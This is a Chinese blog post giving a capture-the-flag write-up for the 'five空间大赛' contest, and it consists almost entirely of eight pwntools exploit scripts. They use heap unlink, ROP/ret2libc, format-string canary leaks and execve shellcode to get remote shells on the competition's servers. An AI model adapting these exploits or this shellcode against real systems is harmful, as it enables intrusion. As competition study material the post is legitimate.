Whali3n51's blog

  • 主页
  • 关于
  • 友链
  • 标签
  • 分类
Writeup

five空间大赛

Whali3n51 发布于 2019-09-01

立雪

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
context.log_level='debug'
#p=process('./pwn15')
p=remote('111.33.164.6', 50015)
def create(size,content):
	p.sendlineafter('Your choice:','1')
	p.sendlineafter("Length of note:",str(size))
	p.sendlineafter("Content of note:",content)
def edit(index,size,content):
	p.sendlineafter('Your choice:','2')
	p.sendlineafter('Index:',str(index))
	p.sendlineafter('Length of note:',str(size))
	p.sendlineafter('Content of note:',content)
def free(index):
	p.sendlineafter('Your choice:','3')
	p.sendlineafter('Index:',str(index))


create(0xf8,'aa')#0
create(0xf8,'bb')#1
create(0xf8,'/bin/sh\x00')#2
chunk0_addr=0x006020C0
admin=0x602088
payload=p64(0)+p64(0xf0)+p64(chunk0_addr-0x18)+p64(chunk0_addr-0x10)
payload+=(0xf8-5*8)*'a'+p64(0xf0)+p64(0x100)

edit(0,len(payload),payload)
#gdb.attach(p)
free(1)

payload=p64(0x100)+p64(0x100)+p64(0x100)+p64(admin)
edit(0,len(payload),payload)
edit(0,len(payload),p64(0x7E4))
p.sendlineafter('Your choice:','2019')
p.interactive()

正定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
context.log_level='debug'
#p=process('./pwn14')
p=remote('111.33.164.6', 50014)
def create(size,content):
	p.sendlineafter("Your choice : ",'1')
	p.sendlineafter("Size of note : ",str(size))
	p.sendlineafter("Content of note:",content)
def edit(index,size,content):
	p.sendlineafter("Your choice : ",'2')
	p.sendlineafter("Index :",str(index))
	p.sendlineafter("Size of note : ",str(size))
	p.sendlineafter('Content of note : ',content)
def free(index):
	p.sendlineafter("Your choice : ",'3')
	p.sendlineafter("Index :",str(index))


create(0xf8,'aa')#0
create(0xf8,'bb')#1
create(0xf8,'/bin/sh\x00')#2
create(0xf8,'dd')#3
create(0x30,'ee')#4
chunk0_addr=0x4040C0
admin=0x4040A0
payload=p64(0)+p64(0xf0)+p64(chunk0_addr-0x18)+p64(chunk0_addr-0x10)
payload+=(0xf8-5*8)*'a'+p64(0xf0)+p64(0x100)

edit(0,len(payload),payload)

free(1)

payload=p64(0x100)+p64(0x100)+p64(0x100)+p64(admin)
edit(0,len(payload),payload)
edit(0,len(payload),p64(0x7E4))
p.sendlineafter("Your choice : ",'70')
p.interactive()

一苇

1
2
3
4
5
6
7
from pwn import *
#p=process('./pwn13')
p=remote('111.33.164.6',50013)
p.sendlineafter('your choice:','1')
payload='a'*0x28+'\x50'
p.sendafter("input massage\n",payload)
p.interactive()

拈花

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
context.log_level='debug'
#p=process("./pwn11")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=remote("111.33.164.6",50011)
libc=ELF("libc-2.19.so")

p.sendlineafter("please input your name\n","A")
elf=ELF("./pwn11")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
pop_rdi_ret=0x4012ab
payload='A'*40
payload+=p64(pop_rdi_ret)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(0x401080)
p.sendline(payload)
p.recvuntil("ail!\n")
libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols["puts"]
print hex(libc_base)
p.sendlineafter("please input your name\n","A")
system_addr=libc.symbols["system"]+libc_base
bin_sh=libc_base+next(libc.search("/bin/sh"))
payload='B'*40
payload+=p64(0x4012A2)
payload+=p64(0)
payload+=p64(1)
payload+=p64(elf.got["read"])
payload+=p64(0)
payload+=p64(elf.bss()+0x100)
payload+=p64(0x100)
payload+=p64(0x401288)
payload+='B'*56
payload+=p64(pop_rdi_ret)
payload+=p64(elf.bss()+0x100)
payload+=p64(system_addr)
p.sendline(payload)
sleep(0.5)
p.sendline("/bin/sh\x00")
p.interactive()

坐忘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
import base64
#p=process("./pwn9")
p=remote("111.33.164.6","50009")
elf=ELF("./pwn9")
mprotect=elf.symbols["mprotect"]
payload='A'*9
payload=base64.b64encode(payload)
print payload
p.recvuntil("welcome to base64 decode server\n")
p.sendlineafter(">\n",payload)
p.recvuntil("decode res:\n")
p.recvuntil('A'*8)
canary=u64(p.recv(8))-0x41
success("canary =====> 0x%x"%canary)
int_0x80=0x4bc587
poprdi=0x401e36
poprsi=0x401f57
poprdx=0x4433e6
start_addr=0x400890
p.recvuntil("continue ?")
p.sendline("y")

bss_addr=elf.bss()
read_addr=elf.symbols["read"]
payload='A'*8+p64(canary)+'A'*8
payload+=p64(poprdi)
payload+=p64(bss_addr&0xfffffffffffff000)
payload+=p64(poprsi)
payload+=p64(0x1000)
payload+=p64(poprdx)
payload+=p64(7)
payload+=p64(mprotect)
payload+=p64(poprdi)
payload+=p64(0)
payload+=p64(poprsi)
payload+=p64(bss_addr)
payload+=p64(poprdx)
payload+=p64(0x100)
payload+=p64(read_addr)
payload+=p64(bss_addr)
payload=base64.b64encode(payload)
print payload

p.sendlineafter(">\n",payload)
p.sendlineafter("continue ?","no")
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
sleep(1)
p.sendline(shellcode)
p.interactive()

玄冥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
context.log_level='debug'
#p=process('./pwn')
p=remote('111.33.164.6',50007)
libc=ELF('./libc-2.19.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def create(size):
	p.sendlineafter("choice >>",'1')
	p.sendlineafter("size:",str(size))
def edit(index,size,content):
	p.sendlineafter("choice >>",'3')
	p.sendlineafter("id:",str(index))
	p.sendlineafter('size:',str(size))
	p.sendafter('content:',content)
def free(index):
	p.sendlineafter('choice >>','4')
	p.sendlineafter("id:",str(index))


def show(index):
	p.sendlineafter("choice >>",'2')
	p.sendlineafter("id:",str(index))


create(0xf8)#0
create(0xf8)#1
create(0xf8)#2
chunk0_addr=0x006020E0
target=0x0602020
payload=p64(0)+p64(0xf0)+p64(chunk0_addr-0x18)+p64(chunk0_addr-0x10)
payload+=(0xf8-5*8)*'a'+p64(0xf0)+p64(0x100)
edit(0,len(payload)+1,payload)

free(1)
payload=p64(target)+p64(target)+p64(target)+p64(target)+p64(target-0x8)
edit(0,len(payload)+1,payload)
show(0)

p.recvuntil('Your data:')
free_addr=u64(p.recv(6).ljust(8,'\x00'))
log.success('free_addr====>0x%x'%free_addr)
libc_base=free_addr-libc.symbols['puts']
log.success('libc_base====>0x%x'%libc_base)
system_addr=libc_base+libc.symbols['system']
edit(1,len(p64(system_addr))+1,p64(system_addr))
edit(2,9,'/bin/sh\x00')
free(2)
p.interactive()

於讴

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

context.log_level='debug'
p = remote('111.33.164.4',50006)
#p = process('./pwn')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf=ELF('./pwn')
libc=ELF('libc-2.19.so')
main_addr=0x04007C3
put_plt=elf.plt['puts']
start_got=elf.got['__libc_start_main']
poprdi=0x414fc3
start_libc=libc.symbols['__libc_start_main']
p.sendline('-1')
p.recvuntil('OH, WHY ARE YOU SO GOOD?\n')
payload='a'*24 + p64(poprdi)+p64(start_got)+p64(put_plt) + p64(main_addr)
p.sendline(payload)
start_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(start_addr)
libc_base = start_addr - start_libc
print hex(libc_base)
bin_sh=0x1633e8
system=libc.symbols["system"]
bin_addr=bin_sh+libc_base
system_addr=system+libc_base
print hex(bin_addr)
print hex(system_addr)
p.sendline('-1')
p.recvuntil('OH, WHY ARE YOU SO GOOD?\n')
payload='a'*24 + p64(poprdi)+p64(bin_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()

副墨

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
#p=process("./bf")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=remote("111.33.164.6",50001)
elf=ELF("./bf")
p.sendlineafter("Are you sure want to play the game?\n","1")
payload='%17$p%26$p'
payload=payload.ljust(28,'A')
payload+=p32(0)
p.sendafter("Input your name : \n",payload)

array=[7427 , 39356  ,9595  ,54062  ,67371 , 42578  ,92585  ,76990  ,22615  ,53318]
for i in array:
    p.recvuntil("Now guess:")
    p.sendline(str(i))

p.recvuntil("Correct!\n")
canary=eval(p.recv(18))
success("canary ==> 0x%x"%canary)
base_addr=eval(p.recv(14))-0x970
success("base_addr ==> 0x%x"%base_addr)
pop_rdi_ret=0xdb3+base_addr

payload='A'*52+p64(canary)+'A'*8
payload+=p64(base_addr+0x970)
p.sendline(payload)
 
p.sendlineafter("Are you sure want to play the game?\n","1")
payload='%19$p'
payload=payload.ljust(28,'A')
payload+=p32(0)
p.sendafter("Input your name : \n",payload)

for i in array:
    p.recvuntil("Now guess:")
    p.sendline(str(i))

p.recvuntil("Correct!\n")
libc_start_main=eval(p.recv(14))-240
success("libc_start_main ==> 0x%x"%libc_start_main)

system_addr=base_addr+elf.plt["system"]
foot=base_addr+0xDAA
init=base_addr+0xD90
puts_plt=elf.plt["puts"]+base_addr
puts_got=elf.got["read"]+base_addr
read_plt=elf.plt["read"]+base_addr
read_got=elf.got["read"]+base_addr

payload='A'*52+p64(canary)+'A'*8
payload+=p64(foot)
payload+=p64(0)
payload+=p64(1)
payload+=p64(read_got)
payload+=p64(0x100)
payload+=p64(elf.bss()+base_addr)
payload+=p64(0)
payload+=p64(init)
payload+='A'*56
payload+=p64(pop_rdi_ret)
payload+=p64(elf.bss()+base_addr)
payload+=p64(system_addr)
p.recv()
p.sendline(payload)
sleep(0.2)
p.sendline("/bin/sh\x00")
p.interactive()
  • #stack_overflow
  • #unlink
Newer

给新生—关于二进制怎么学习

Older

攻防世界高手进阶PWN(2)

© 2023 Whali3n51